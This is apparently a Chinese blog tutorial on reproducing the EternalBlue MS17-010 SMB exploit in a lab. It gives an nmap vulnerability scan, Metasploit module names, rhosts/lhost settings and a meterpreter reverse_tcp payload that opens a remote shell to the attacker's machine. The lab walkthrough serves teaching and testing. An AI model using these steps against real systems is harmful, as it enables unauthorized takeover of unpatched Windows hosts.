永恒之蓝MS17-010漏洞复现及利用

一、什么是永恒之蓝?

永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。

SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

二、复现的前期工作

1、靶机:准备一台Windows server

2、攻击机:kali(ip自定)

3、工具:nmap(主要用于漏洞扫描,当然也可以使用其他扫描工具)、metasploit(msf)

三、漏洞利用

1、使用nmap工具对靶机进行漏洞扫描,扫描命令: nmap --script=vuln 10.0.0.38

2、根据nmap工具,扫描出其开放端口如下:

3、通过扫描发现靶机存在多个漏洞包括“永恒之蓝漏洞ms17-010”

4、通过前期的整体扫描,使用kali对MS17-010这一永恒之蓝漏进行复现。

登录kali,开启msfconsle (每次界面显示不同画面属于正常)

注意:在最后进行攻击时(exploit)可能会出现以下报错:

因此如若出现类似报错,在测试前进行如下设置可以运行成功,或者重启一下靶机以及攻击机,造成的原因可能是端口占用的原因,也有可能是其他原因造成的,很玄学:

五、具体攻击操作

1、搜索永恒之蓝对应的漏洞扫描模块 search ms17-010

2、使用auxiliary/scanner/smb/smb_ms17_010辅助模块,并设置目标主机ip,经过扫描模块发现靶机极大可能遭受ms17-010永恒之蓝漏洞的利用

3.、尝试使用exploit进行永恒之蓝漏洞攻击,搜索攻击模块,并使用攻击模块

4、查看设置:show options ,yes为必配,如果没有配置目标主机rhosts,配置目标主机配置命令set rhosts ip:xxxx,并查看是否配置成功。

5、查询攻击载荷,并配置攻击载荷

6、查看配置

目标主机配置成功

攻击主机需配置ip  set  lhost ip

6、配置完成执行run,成功拿到权限

六、附加:

在rhosts与lhost存在、445端口开启的情况下

1、攻击载荷可以设置为set payload windows/x64/meterpreter/reverse_tcp

2、最终反弹一个meterpreter,从而拿到权限

3、同时该攻击载荷的使用可以有概率的避免前面所述的RubySMB:Erro所出现的通讯中断报错(如下图)

4、权限拿到了,剩下后面一系列的神操作,自行安排

永恒之蓝漏洞复现测试相关推荐

  1. 043 扫描技术,OpenVAS,AWVS,永恒之蓝漏洞复现

    文章目录 扫描技术 扫描神器 资产发现 主机发现: 端口扫描: 网络漏洞扫描 OpenVAS的使用 AWVS的安装与使用 永恒之蓝漏洞复现 扫描技术 扫描 自动化提高效率 扫描神器 nmap,跨平台使 ...

  2. MS17_010永恒之蓝漏洞复现

    MS17_010永恒之蓝漏洞复现 文章目录 漏洞原理 实验环境 信息收集 文章目录 漏洞原理 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可 ...

  3. metasploit中msfconsole使用教程,永恒之蓝漏洞复现

    文章目录 前言 msfconsole常用参数 打开和关闭 search 查找模块 use 使用指定模块 info 查看模块的详细信息 show 查看,set设置 run 和 exploit mf17- ...

  4. 【MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】

    MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6 文章目录 MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-01 ...

  5. linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...

  6. MS17-010(永恒之蓝)漏洞复现和分析

    MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...

  7. Windows 7 ms17-010永恒之蓝漏洞复现

    Windows 7 ms17-010永恒之蓝漏洞复现 复现ms17-010漏洞环境: VMware Workstation : 攻击机:Kali-Linux : 靶机:Windows 7 : 使用步骤 ...

  8. 永恒之蓝漏洞复现(ms17-010)

    文章目录 一.永恒之蓝(Eternal Blue) 二.复现环境 三.复现过程 1.主机发现 2.进入MSF框架 3.使用ms17-010扫描模块,对靶机进行扫描 3.1使用模块 3.2查看模块需要配 ...

  9. 【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)

    目录 1 MSF框架 1.1 MSF简介 1.2 MSF五大模块类型 1.3 渗透攻击步骤 1.4 小结 2 实验简介 2.1 永恒之蓝简介 2.2 实验环境 2.3 实验目的 3 实验前准备 3.1 ...

最新文章

  1. RDKit | 基于RDKit(≥2020.09.1)的相似图绘制新方法
  2. Rails工作效率和Java运行平台
  3. HDU2425:Hiking Trip(简单bfs,优先队列实现)
  4. 高并发的理解和使用场景-----特意区别和多线程的关系
  5. [html] html如何创建图片热区(img usemap)?
  6. 前端学习(2710):重读vue电商网站30之左侧菜单栏图标设计
  7. tomcat的连接数与线程池
  8. python 基础语法学习笔记(2019年4月第二周学习笔记)
  9. SPHINX安装步骤
  10. VB中输入函数InputBox的用法
  11. zlog 纯C日志函数库
  12. oracle修改redo路径,在线修改redo文件的路径
  13. Python自动化测试中的参数化使用
  14. win8.1下安装vc6
  15. 0x00007FFEB5D49149 处(位于 Project1.exe 中)有未经处理的异常: Microsoft C++ 异常: cv::Exception,位于内存位置 0x000
  16. 餐厅预订系统如何选?餐厅预订系统推荐
  17. LMS、kalman、RLS的Matlab仿真
  18. Hole_making基于特征加工
  19. 高并发高可用之ElasticSearch
  20. 企业运维之七层负载均衡--Haproxy

热门文章

  1. HASH和HMAC(7):SHA3-224/256/384/512算法原理
  2. systemd介绍六:Journalctl查看并操作sytemd日志
  3. 微信发展简史:微信成功的必然和偶然
  4. 迪文工控触摸屏使用modbus功能
  5. 雷曼光电:LED行业黑马闪亮上市
  6. 使用git管理文件版本(本地仓库)
  7. 1 Tbps! 使用英特尔第三代Xeon® Scalable Processor 加速VPP IPsec
  8. 自动填充被拆分的单元格
  9. 想学会刷机就得学会怎么刷小米4S这种手机就能会了
  10. Android:访问存储失败.FileNotFoundException open failed: XXXXXXX EPERM (Operation not permitted)